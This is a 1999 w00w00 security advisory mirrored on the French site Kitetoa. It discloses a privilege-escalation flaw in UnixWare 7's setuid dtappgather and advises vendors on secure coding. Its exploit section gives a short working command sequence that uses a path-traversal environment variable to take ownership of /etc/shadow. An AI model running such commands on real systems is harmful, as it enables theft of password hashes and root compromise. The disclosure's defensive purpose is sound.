[Kitetoa, les pizzaïolos du Ouèb

w00giving '99 -1-

 
Sommaire de ce dossier
Ze advisories
Ze linkz
 

Introduction to w00giving '99

RFP's most excellent 0kt0berfest commitment to working for
everyman to make the world more secure, caused w00w00 to stop
and give thought to our collective contribution to the world
of computer security.  Finding ourselves lacking in the past few months,
our hearts were pricked and we were driven to repentance.

Being the month of thankfulness for all we have received this year,
w00w00 looked back and found many things to give back to the computer
security community.
============================================================
To celebrate the upcoming mass-destruction and world-wide chaos in 2000,
w00w00 Security Development (WSD) will be releasing many advisories
depending on vendor's timely responses.

The severity of each vulnerability will outweigh the previously posted
one, so keep your eyes out!

If all goes according to plan, w00giving '99 will close with its largest
vulnerability on Jan. 1, 2000, aka w00mageddon.

Note: eEye Digital Security is also participating with us to independently
release NT tools and vulnerabilities within the next few weeks.

w00w00, eEye, rfp, technotronic, wiretrip

======================================================
w00giving '99

Let the games begin...
======================================================

Vendors should review available best practice guidelines on
secure programming techniques. Should they have done so in this
instance, they would have instantly recognized the security issue we
discovered.
We also understand it's much easier to audit code post-release,
and realize the underpaid coders are pushed to market by
marketing monkeys and management that do not represent
secure programming techniques.

MANAGER NOTE:
======================================================
THIS IS IMPORTANT, SORRY ABOUT THE LACK OF
POWER POINT PRESENTATION!

"GIVE YOUR CODERS MORE MONEY AND TIME!"
======================================================
END OF MANAGER NOTE, GO BACK TO YOUR MEETING.

Note:
All you really have to do to find bugs like this is use some
application like strace, ktrace, or truss(depending on your
operating environmen)  and look for suspect calls.

For instance, if you see a call to getenv() and then the
value of the environment variable mysteriously showing up in an
open() call, there is probably something wrong here.

Pay strict attention, you will see this material again.


======================================================



UnixWare 7's dtappgather
Discovered by: K2 (ktwo@ktwo.ca)

UnixWare 7's dtappgather runs with superuser privileges, but improperly
check $DTUSERSESSION to ensure that the file is readable/writeable or
owned by the user running it.

---------------------------------------------------------------------------
Exploit:

rain:/usr/dt/bin$ export DTUSERSESSION=../../../../etc/shadow
rain:/usr/dt/bin$ ./dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/../../../../etc/shadow: File
exists
rain:/usr/dt/bin$ ls -la /etc/shadow
-r-xr-xr-x   1 ktwo     other          358 Oct 26 04:37 /etc/shadow*

---------------------------------------------------------------------------
Patch:

Because SCO doesn't release source for UnixWare, we must wait for them to
provide one.

---------------------------------------------------------------------------

Contributors to w00giving '99: awr, jobe, Sangfroid, rfp, vacuum, and
interrupt
People who deserve hellos: nocarrier, minus, daveg, nny, marc,
and w00god blake

w00w00 Security Development (WSD)
[See http://www.datasurge.net/www.w00w00.org, the official mirror, until
relocation of w00w00.org is complete]

 

Page d'accueil

Nous écrire
By mail

Nous envoyer des commentaires
By la page de le Feed-Back

Les mailing-lists

Nouveautés

Les stats du serveur

et...

Qui sommes-nous?

Le Sommaire
de
Kitetoa
(orientation...)

Sommaire général du site
(voir tout le contenu)

Les rubriques!

Les livres publiés par Kitetoa
Les Textes
Les interviews

Kit'Investisseurs
Fonds d'écran et autres trucs

Les rubriques!
(suite)
Les Let-R-s

Des Images
On s'en fout!

KitEcout'
KessTaVu? -KiteToile
Voyages

Statisticator, l'autre site...

Les dossiers :

Precision [ZataZ]
Le monde fou des Admins
Defcon
Le hack le plus bizarre
Guerre de l'info
Convention contre la cyber-criminalité
Hack

Questionnaire visant à améliorer le contenu de  ce site si c'est possible et pas trop compliqué

Réponses au questionnaire visant...
(merci)

Le Forum
Kitetoa-blah-blah

Rechercher
sur le site

...et sur le Net


Des liens
et
D'autres choses du Ouèb